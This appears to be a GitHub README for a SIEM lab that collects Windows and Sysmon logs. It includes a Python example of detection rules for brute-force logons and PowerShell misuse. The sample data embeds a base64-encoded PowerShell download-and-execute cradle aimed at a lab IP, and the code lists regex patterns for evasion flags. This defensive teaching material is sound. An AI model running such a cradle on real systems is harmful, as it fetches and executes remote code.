cyb-gufran/SIEM-Log-Monitoring-Project
🧠 SIEM & Log Monitoring Project

A practical cybersecurity project focused on log collection, attack detection, and incident response using Splunk or the ELK Stack.

🎯 Objective

Build a SIEM lab to collect, analyze, and visualize logs from Windows systems to detect malicious activity.

🧩 Tools Used

  • Splunk / ELK Stack
  • Windows Event Viewer
  • Sysmon
  • PowerShell
  • Kali Linux (for attack simulation)

πŸ—οΈ Project Phases

  1. Setup & Configuration
  2. Log Collection & Ingestion
  3. Threat Simulation
  4. Detection & Response
  5. Reporting & Documentation

📊 Expected Output

  • Interactive dashboard (attack timeline)
  • Alerts for brute-force logon attempts and PowerShell misuse
  • Incident report PDF (with recommendations)
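The two alert types listed above (and the Threat Simulation and Detection & Response phases that produce them), as an added worked example that is not code from this repository: a small Python detection pass over constructed Windows Security (Event ID 4625, failed logon) and Sysmon (Event ID 1, process creation) records. The flat dictionary fields (`time`, `channel`, `event_id`, `ip`, `target_user`, `image`, `command_line`) are an assumed simplification of what a Splunk or ELK ingest would index, every sample event is hand-written rather than captured telemetry, and the thresholds (5 failures in 2 minutes) are arbitrary lab values.

```python
"""Toy SIEM detection rules for the two README alerts: password brute force
(repeated Security 4625 from one source) and PowerShell misuse (Sysmon 1 with
evasion flags or a download cradle).

Added example; not code from cyb-gufran/SIEM-Log-Monitoring-Project.
Event dicts use an assumed, simplified field layout; all events are constructed.
"""
import base64
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

BRUTE_FORCE_THRESHOLD = 5                 # assumed lab value
BRUTE_FORCE_WINDOW = timedelta(minutes=2)  # assumed lab value

# Build the -EncodedCommand value the way PowerShell expects it:
# base64 over the UTF-16LE encoding of the script text.
_CRADLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.99/p.ps1')"
_ENCODED = base64.b64encode(_CRADLE_SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [  # constructed, not real telemetry
    # six failed logons against "administrator" from one host inside 60 s
    *[{"time": f"2024-05-01T10:00:{s:02d}", "channel": "Security", "event_id": 4625,
       "target_user": "administrator", "ip": "10.0.0.5"} for s in range(0, 60, 10)],
    # a lone failed logon elsewhere: a typo, must not alert
    {"time": "2024-05-01T10:05:00", "channel": "Security", "event_id": 4625,
     "target_user": "jsmith", "ip": "10.0.0.7"},
    # benign interactive PowerShell, must not alert
    {"time": "2024-05-01T10:02:00", "channel": "Sysmon", "event_id": 1,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe Get-Service"},
    # hidden window, no profile, encoded download cradle
    {"time": "2024-05-01T10:02:30", "channel": "Sysmon", "event_id": 1,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
]


def detect_brute_force(events, threshold=BRUTE_FORCE_THRESHOLD, window=BRUTE_FORCE_WINDOW):
    """Alert when `threshold` or more 4625 events arrive from one source IP within
    a sliding `window`; re-alerts for the same IP are throttled to once per window."""
    failures = sorted((e for e in events if e["channel"] == "Security" and e["event_id"] == 4625),
                      key=lambda e: e["time"])
    recent = defaultdict(deque)   # ip -> deque of (timestamp, target_user) inside the window
    last_alert = {}
    alerts = []
    for e in failures:
        t = datetime.fromisoformat(e["time"])
        q = recent[e["ip"]]
        q.append((t, e["target_user"]))
        while q and t - q[0][0] > window:
            q.popleft()
        if len(q) >= threshold and (e["ip"] not in last_alert or t - last_alert[e["ip"]] > window):
            last_alert[e["ip"]] = t
            alerts.append({"rule": "brute_force", "ip": e["ip"], "count": len(q),
                           "first": q[0][0].isoformat(), "last": t.isoformat(),
                           "users": sorted({u for _, u in q})})
    return alerts


PS_IMAGES = ("powershell.exe", "pwsh.exe")
# flags used to hide or bypass: -enc/-e, -nop, -w hidden, -ep bypass
SUSPICIOUS_FLAGS = re.compile(
    r"(?i)(?:^|\s)-(?:e|en|enc|encodedcommand|nop|noprofile|w\s+hidden|"
    r"windowstyle\s+hidden|ep\s+bypass|executionpolicy\s+bypass)\b")
# download-and-execute cradle tokens, checked in both the raw and the decoded command line
CRADLE = re.compile(
    r"(?i)\b(?:IEX|Invoke-Expression|DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient)\b")
ENCODED_ARG = re.compile(r"(?i)-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(command_line):
    """Return the plaintext of an -EncodedCommand argument, or None if absent or undecodable."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect_powershell_misuse(events):
    """Alert on PowerShell process creation carrying evasion flags or a download cradle."""
    alerts = []
    for e in events:
        if e["channel"] != "Sysmon" or e["event_id"] != 1:
            continue
        if not e["image"].lower().endswith(PS_IMAGES):
            continue
        cmd = e["command_line"]
        decoded = decode_encoded_command(cmd)
        flags = [f.strip() for f in SUSPICIOUS_FLAGS.findall(cmd)]
        cradle = set(CRADLE.findall(cmd))
        if decoded:
            cradle |= set(CRADLE.findall(decoded))   # the payload only shows up after decoding
        if flags or cradle:
            alerts.append({"rule": "powershell_misuse", "time": e["time"], "flags": flags,
                           "cradle": sorted(cradle), "decoded": decoded})
    return alerts


def run_detections(events):
    return detect_brute_force(events) + detect_powershell_misuse(events)


if __name__ == "__main__":
    for alert in run_detections(SAMPLE_EVENTS):
        print(alert)
```

Two points the SIEM version should carry over. The brute-force rule uses a sliding window; the usual Splunk shape, roughly `index=wineventlog EventCode=4625 | bin _time span=2m | stats count by _time, src_ip | where count>=5` (field names depend on the add-on you ingest with), buckets time into fixed slots and can miss a burst that straddles a slot boundary, so either shorten the span or accept that trade-off knowingly. The PowerShell rule decodes `-EncodedCommand` before matching cradle tokens; a rule that only inspects the raw command line never sees `DownloadString` inside the base64 and is trivially evaded.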

πŸ“ Author

Gufran Ahmed
Cybersecurity & Network Engineering | Penetration Tester
πŸ“ London, UK
πŸ”— LinkedIn: linkedin.com/in/gufran-uh
πŸ’» GitHub: github.com/cyb-gufran

About

A practical cybersecurity project focused on building and configuring a SIEM environment using Splunk or the ELK Stack to collect, monitor, and analyze Windows event and Sysmon logs. Includes real-world attack simulations, threat detection dashboards, and an incident response report.
